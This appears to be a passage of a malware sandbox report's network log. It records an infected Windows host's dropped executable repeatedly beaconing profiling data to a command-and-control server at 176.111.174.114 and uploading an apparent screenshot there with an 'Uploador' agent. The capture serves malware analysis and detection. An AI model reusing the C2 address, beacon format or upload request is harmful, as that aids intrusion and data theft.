                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:16.634388924 CEST11405OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          414176.111.174.11480192.168.2.449997C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:16.739522934 CEST11433INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          415192.168.2.449998176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:16.944256067 CEST11593OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          416176.111.174.11480192.168.2.449998C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:17.043406963 CEST11621INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          417176.111.174.11480192.168.2.449996C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:17.047816038 CEST11622INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          418192.168.2.450000176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:17.258733034 CEST11623OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          419176.111.174.11480192.168.2.450000C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:17.363420963 CEST11624INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          42192.168.2.449769176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:17.284667015 CEST4542OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          420192.168.2.450001176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:17.577191114 CEST11625OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          421176.111.174.11480192.168.2.450001C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:17.677256107 CEST11625INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          422192.168.2.450002176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:17.881489038 CEST11626OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          423176.111.174.11480192.168.2.450002C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:17.984365940 CEST11626INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          424192.168.2.450003176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:18.198049068 CEST11627OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          425176.111.174.11480192.168.2.450003C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:18.302170992 CEST11627INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          426192.168.2.450005176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:18.509008884 CEST11628OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          427176.111.174.11480192.168.2.450005C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:18.610826969 CEST11628INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          428192.168.2.450006176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:18.819572926 CEST11629OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          429176.111.174.11480192.168.2.450006C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:18.924428940 CEST11629INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          43176.111.174.11480192.168.2.449769C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:17.388114929 CEST4542INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          430192.168.2.450007176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:19.128921032 CEST11630OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          431176.111.174.11480192.168.2.450007C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:19.228918076 CEST11630INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:19 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          432192.168.2.450008176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:19.447221041 CEST11631OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          433176.111.174.11480192.168.2.450008C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:19.550362110 CEST11631INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:19 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          434192.168.2.450009176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:19.671717882 CEST11645OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227248
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
